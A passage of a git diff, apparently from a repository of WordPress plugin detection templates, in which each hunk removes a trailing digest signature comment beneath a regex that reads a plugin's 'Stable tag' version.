4b0a00483046022100c16d40d27c810683d8328feae8ed100fb945ee9bf64c298df29699dea4f061730221009993b93fb31d3bb0cd730aa4efce52e14b8673f1aa2baccbbc327b1e716025c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index afe03072ec..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200c3cd48a95ab83c80de60f8de08e2829b28f48f743fe1edd8c181122ba0a91ce022046f5e3d8dfef4eb8f13ba3959b2e1787bc50762b481eac39f244efe2ed8b2d76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index b3d6557e06..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009d2fdb0b30cead328a1c292367cddb89ae90515493470a90473a83301e345a4e02200d941c45d0f369da569685371becf9a07abefc8f324cd4afdaed555a8b7625b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index ce072b1c26..6ac2212b4b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fc8a75093f07bf6233fbe3ae49f4e214793dd38c56450e8ca6ca4acd2152011a022074a18d76919015f1b344cc020b8cff53515bf2035d33fb28eebe4091376bda05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 5d1eb7f17f..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100de713f07660712ec249fe950c892c05c5edbb71f5b554ad3a89a46066efed221022100b25b325b99046fca924c77e3428da07f77ec423c455a0736cd6184fc21a74022:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 4352910609..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ae1c9cfc46fe67685209dd83e408c477bea61e8c228ad5df7044e2656414191d02210080440b044961b2460d8e1f16020a47bf208697282d9eee2e0f650da0e3634cb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index b64caaf551..286dfdaec6 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210099fb8af200be4f19b9efb355afd80862f49415b4f981e10e062690fc372ccf7d02210081705debfcbcfb27debdc689b9328a5245df12b0b45620691b78b97320149ba1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 7c589eb897..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207a3fba997522b6375dc01ae816d5d7575740fb1c436db732e461e79851dff343022100aba982ab399e74e2f9ac443422662f5d27e1847ea4bc775101f8a3a33968e223:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 4508433059..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022026ce863e3324a4530f1379f3b2bbdb2c5201830d0d29307f796def7d9123bdae02204d3ae38938d8bc022057301b31709a51b4290178d0aae1d12fa90277ff9652c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 0d8a329ad3..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a49856814a72669370590435c3cce675878e49bb1fd477b7f2fd7bf6c4b9d77902205315b7cd369b634b3f67aab145b430a7f9c38604e8e8906a6b8336de106d01ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index b572df769b..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c53a143a27ee5f9bb174ecb258f3b1dfcb432090ffd01f68dd2c651a1059d2cd0221009b938b89e7a8e84f646900991872cd1c8bb4a851c6be995e817edf826be236c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 755cd94ccb..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e33f45deb93ed806a76b8484eeef63e2ffdab143f5bd0d19cfc35cf66df9044e022100a06e3464bbd0de4761176863ebe504cfe8a8cbbd30c709ea7a56fbf312414dc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 52b2ca5877..2b29428cf1 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008b26f3f2a4cf5d7c62f7dd74121bc248aac56394e7958c00f62ae5f08799b316022100cc9770d4e195a2b2e984110dc4282c2396eeeeddf8a763af7c19470e00c5f429:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 35b28c695b..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022049aaf0c410287898b6d7d68a3fda16a05cec83e9c8887de7adb98c0d2f04717a022100fdb233303c88927044c21dfc722f4399d72bfa522f8e6991033efa485b04f8d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index e60bc265b0..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b91a284fadf501c3990d9c2a4ed75ea587d5fed5f70eff5987a4df07acd58ed1022100cfe02ec841e4b4e4e3f33d7148bab76098598f64a0aea3dbbf9670818bc1a724:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index c0e722d69d..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022062c08108b72141ccb5c5960e374d4f8dab2834ea5e45bc5181301e5aa4470732022100b3e69801a6f9fbd767393908b570e6ec7fa4440b79fcca8b294def7b6f0dedbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index e6dbdec837..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009cc88a9680889ee4645b3326724679e1422c1b63546a164f8e60a3a97081d01e022100f737cc2bb321a79f51abf82168ab025c375059a042a0904cfedfcb456e57e80a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index c04752385b..2ae6bafbba 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220597af304614da3b5ea4808e52945576ecc212604609394b80bdb10453c01f8db02205778b897b7c832f0824040ffb2978b166bb9f3de4f11f1a3fbf87b4cbc928423:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index e6c325eade..d0dc8d92bb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022002e454bcc44eb30b8e8781d9457f0f92353d3ea31981ea6347e31c7c67e7f2550220193e71c0aa78577be88ed347e04e45de9fbbcf2d6d4896f84dc3827b024d6076:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index f0aa1af82c..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100984642a6c35ef84be236f7371dc398138530db536083f2a4f641a9deae903f450220699621aabb1ef4fc60bad4508bf01619fcb72637c9b20f5f65a23a20f9f00a4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index d56e92d4d1..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022002959b79058c85afb41192a06327cfc41a09b783dbc60bdd2aae8024cfe82011022100f92b5bee2ecdbd12bd55b1f99013be094e48ec9f9fe6c889d50bbe2c177833b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index f5d929a6b8..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210092c6c381245565f352b96727fa734ecc0fd419af126a98ead4c0f7d5a863dc9f02207a8133f22e8924b88720d41303280e2d4568df1e75d0fc6ced0b46af39915888:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index 515b217cc0..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d8f289c141d45919a85496f04fe8bef243b446b33cd56c2e5ca2674e91afb9400221008e776c6bc31308c168abf38bf9f8379a26707ae47eb814652cfcba2697b143b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 1487ca23ed..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022025ac351ec5554bdb0aa5dfddf80de32bc87d58a5fcd0a12c3598c60641dbf78e022100f01f567a81d50ed6d6435e5f04c69df6d4854c3cdda96ff00e41f3cf8c44b4b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index ceff76e48d..f7c9ef9b1f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b3ec6d2964f88e8dbf1a455fa41628b4945eca89a7fbdb3cc4a8dbdea4e5c711022060d54c1bf9286a2d0df16cb684610b2465cb0b7b48dc696c2a825e93fd11fef2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 3662a68149..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a97e680f8334376e9ebf356e9ef829590c5fbc8cd476e849bf03ce868f72980a022074108a41d43b9c6063dd965fda853381ff14eb008d51f19924bc857ff82ec9f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 217a935429..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009f751842d04149f68081817645d436cc17dd7c66900fbacda03388b29afc2e7802205bb63194d52517bc17eadf5efa83acf36381ff18ac04f553e1986eaff1147ac4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 06bcecd5e8..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bb7facb11729d5321eb1a0d75c65b3d5cc2243bfe469cf65f6cf9b38670bc738022054d492d44ab1bd3af4064aae52f41db0aa3988850e0d572e14d26f5d866bf0f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index d19bf2a7e7..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008ae84bdf9a8ccc7afb911c5f48381e214df601b5ceda32d56782f9a8d8117c1e02201ed775687e89a1d81ff4a51f1ceb382f9762025cd5e2648e084f9081b4715643:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 2ac9a4f05f..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204e0ec20c406e5b99781814fef52f59cd56823f3b33544dec9f7db8819986521a022100a806ea477d9b029688e0e6b222193db09547d46cd113cfcaa6b394cfaaea747d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 67f5008ba2..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fbd89c951ef81a025382d46ea36e3f1d9ace97a29e7ee03a6f1be7b39d002a36022100df99e65f5bdd3fb5276aab35c879174da5c2941cc0161f6dffa226473778cdaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 8810e44ee7..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c5a21bd2ccdd4a3166b1b5bc6bdecb02c03c2164321e2b1c45caf6833658188a0220169cc3b1265ef0578959e884ce51051e4dd023a0d16f1b0059fb533938a5b079:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index 56b40b84ba..a773829b7d 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200cffb161a5a96db652c5e3f954a587603b34bc229bdc5f6d6c30bb0dacdfee06022100894e6a619caf66a2f14c10a2beafa546efbeb8db88f62239fece444dee0087e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 40a8c1b6d7..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220195396fba8d266836461944854121821bb7ba9e60d9f5e569f6ada512558a8d402205861df8943f11cf6f19b310ff80e5eaf4507c5acd76b306a7951e3129900918f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index fdf34e0bbe..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210088ef7b51bad8db12eaf31b92168f57a5bbcc008cd63588604f1d412faea2e024022100f792c2d94bb5c7da9b6206643284dbdf5b195e7ab4ee27cea6561f3772cb2af8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 827d8324f6..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f8888271c560d4b9b1fb5ea5accd143ccd2e31884d30877ce1e7b812fd8b060b022100b53a15f950f78834458f1acfc228730bfeda9b26ac5a34c1dcdc92b422a99881:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index dbec64f08d..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201ea8dfac92de7c018e358467e83d8639c70943c1527a70fc222060cbad3b8b8d0220750ac1dc8157b4747aad079c3a50aaf856323dd0928bfc844153cc68f895351f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index a0328536ee..10dad2d2fb 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100948cb90abcb97cd4e20f4827dfcbf86f118746b243ba234157f28f85c1cbeb1b02200f5eb113fbee6d4af31be90f6e704678b97de83fe91e947c58b5832d6cf5a8e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index 0f018d743f..e9efe6fb53 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207223fb32bc0ecad4e4a06cfd45f4eceafaf28a6a75383254c8bea711b0a1bd83022009792015181b77eee1210f36ff1a4153f5d1157364a1165d929375512993c94c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index d4c7803419..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220324249c991f9e8a16f25594b922204d034fd07c6e821e52977cd9b68ee04e4d602210091bf910d4698debdc39bc4bda8a46c6779712754a81765b36ff6e040afe07732:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 6213a1fd00..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207e2485415597cdecf76ee2cc2c3c33f66ff5b44cdf30c68ea631f7300092d2630220245318bf18fd55de69aa877dd7641f85a72379a1df3e4859c264d618cb3a042e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 90dd67281b..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bfe7aadddbffbbe9e0700d4a6747783d88cefc339cf630c32dbd49c336ca2db2022100a4ac9b8fe4dbf1b26a2823c7f9ff7290d7c371c036f667d81227e4d19a206ee6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index e5aaeb365a..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205927a3a12a4f763b5a50610310f691445818b5443e389de5754b8cbda0e533fc022100a21635b544e50f2b8d67eff9221ca93e2a37df7f065f59ba3b8157623b65960a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 9901772f49..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205b201883a67c526bb5544765a4eeedd144a1a93f939ed39310e51c7dee6f133b0221009da08002fd82854e36cc9689f99b67a7d74c6e65f5cbc9bb047756421c0de7ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index b8a394f8d7..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220206bbcdeef5b76e68695de877becf59ce6beea1307c43ca54bedb5b67f5d2942022033d72f0e58b871af22c9374518aa23d4b6fc74bf4295e4b174c33d344c76c93f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 9d8a3b932f..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022078d09f0df4421d3b436e94a1d25bc795dc9162fb19788131cdd22403dfc82d92022048ad5642870e1affb0d9e58a2d836583cfe2b761caeb7feb2f225382f8573b2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 67e6db0a72..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c7563f788ebfeeb04d4e280a4e994601503a4e515ca8c56b7617b2c2e459a06e022100adb05e82b84a6a7af04dd20c0721979dcd1eed632076cae9cdf4f3821232fde9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml 